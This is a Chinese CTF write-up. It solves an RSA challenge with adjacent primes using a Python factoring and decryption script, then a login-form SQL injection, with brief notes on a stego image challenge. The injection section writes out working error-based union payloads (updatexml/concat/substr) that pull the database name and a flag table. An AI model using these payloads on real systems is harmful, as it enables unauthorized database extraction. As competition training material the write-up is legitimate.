0x01 RES*3
flag = b'xxx' e = 0x10001 # p = getPrime(1024) q = next_prime(p) n = p*q*3 m = bytes_to_long(flag) c = pow(m , e, n//3) # c=··· # n=···
这是加密源码 rsa密钥格式: 公钥(e,n) 私钥(d,n)
已知:
-
q是p的下一个质数
-
n 为两个互素(p,q)相乘 是公私钥的公共部分
-
公钥e 由对p,q使用欧拉函数=t
-
1<e<(p-1)*(q-1)=t
-
质数
-
非t的因子
-
密文c
-
函数功能: pow(a,b,c) ~ (a**b)%c
-
选取两个互素的数(q,p)
-
pq=n/3 即pow第3个参数 _当a3=n时 n//3=n/3_
加密流程 对flag(大数)取公钥e的幂再取n/3的模 => c = pow(m , e, n//3)
因为1.点 我们可以轻易的 把n/3分解 出 q和p 绕后再和公钥e,密文c 搞出密钥
然后套脚本
#python3 from gmpy2 import invert,iroot,next_prime,is_square from Crypto.Util.number import long_to_bytes def C2(p,q,e,c): """ p q 两互素数 e 加密公钥 c 密文 """ n = q * p d = invert(e, (p - 1) * (q - 1)) m = pow(c,d,n) # 明文= (c**d) % n print(f'密钥d= {d}\n明文m= {m}\n= {long_to_bytes(m)}') def pow(c, d, n): # 功能=日常版:(c**d)%n """模幂运算"""# pow实现 result = 1 c = c % n while d > 0: if d % 2 == 1: result = (result * c) % n d = d >> 1 c = (c * c) % n return result class Find_two_primes: def ori(n): """求解两个质数mini""" for i in range(2, n // 2 + 1): if n % i == 0 and is_prime(i) and is_prime(n // i): return i, n // i # 找到两个质数 def pri(n): # 优先 # n为两个质数的乘积 #且俩个质数是相邻的(中间没有其他质数) 例如 p=3,q=next_prime(p)=5 temp = iroot(n, 2)[0] # 函数介绍 # 大数开根参数2为要开的几次根 填3就是开3次方根 # 返回值(开根结果,是否整开) 例如 iroot(8,3)=(2,True) p = next_prime(temp) return p, n // p def las(n):# 备选 """平方差遍历法""" a = iroot(n, 2)[0] while True: B2 = pow(a, 2) - n a += 1 if is_square(B2): b = iroot(B2, 2)[0] return a+b, a-b class Big_int_Div: def v1(big_integer,n): """计算机除法""" result = 0 while big_integer >= n: big_integer -= n result += 1 return result def v2(big_integer, n): """更计算机的除法""" result = 0 while big_integer >= n: shift = 0 while big_integer >= (n << shift): shift += 1 shift -= 1 subtract_value = n << shift result += 1 << shift big_integer -= subtract_value return result
-
n=n/3
-
q,p=分解n
-
解密函数(p,q,e,c)
# ··· def main(): n =48631461114504503213933048503236631533108340381677563261416131764658798634145883506203948744902487835274001561646896513476389080691870633589596240502747958833769040450560137103097820329536792734430618544696183744330640322513642884524728049974270249753729085459403038574272231768464838017621829072648029807829095343724559240032690561313806010603606220226714941054497016911813749574102838793091541121640667581981661315152119641131315431472431865815936345789998105577855981463908914332966444762997193930994154180446298739894980388777485003296091460844322677788383641440700742948260816970842749014086241622298755623639397 n_r=Big_int_Div.v2(n,3) p,q= Find_two_primes.pri(n_r) print(f'p= {p}\nq= {q}') e = 0x10001 *1 print(e) #65537 c = 15610381842734402431720343151826628531590822170873607546255021731309786187174986256688016153266596244825648019184784412881437108994627156029510560778331435777505796991022243495209454544720846975689290327454048500687196256648449010010966539798671100193800707101606911948736138293851168052487163502836832441394970590930617478469167562843650297355987752517460703563226259207743330949709693581492700790922368978463309899994408526223486195108719647298439243184344162210231016213340341385576796861623571842183930617482532017200517037600184736532750337445679952241192297520774169278803591905366512003079320198165950526741789 C2(p,q,e,c) if __name__=='__main__': main()
flag{2d08613c-5a4d-a0f1-b0fd-c195026c87b7}
0X02 ROTOTS
0X03老生常谈的注入
进入界面,进行传值抓包
发现是POST传值
开始推测注入点
uname=admin'&passwd=123456
没图片,这边先让sql语句报错,报错信息输出and ('passwd=123456') ...发现闭合点是('')
开始构建pyload,没在比赛的时候截图
uname=admin') union select 1,updatexml(1,concat(0x7e,(group_concat(database()) )),1),d--+ &passwd=123456 //爆出数据库 uname=admin') union select 1,updatexml(1,concat(0x7e,(select group_concat(flag_that_you_find_must_be_me) from flag)),2),d--+ &passwd=123456 //中间的爆表,数据列就不写了;这句爆flag,发现没全出来要进行截断读取 flag{lIk1wywjS4uo48BqrhcKLUhKTb uname=admin') union select 1,updatexml(1,substr(concat(0x7e,(select group_concat(flag_that_you_find_must_be_me) from flag)), 10),d--+ &passwd=123456 截断输出 wywjS4uo48BqrhcKLUhKTboPFYJR} 拼接后flag{lIk1wywjS4uo48BqrhcKLUhKTboPFYJR}
0x04梦回还
发现是一个图片
放入Stegsolve
发现7z压缩包文件头,保存出来
flag{2cf1cf10-ab68-67a0-bf27-226c0b839a66}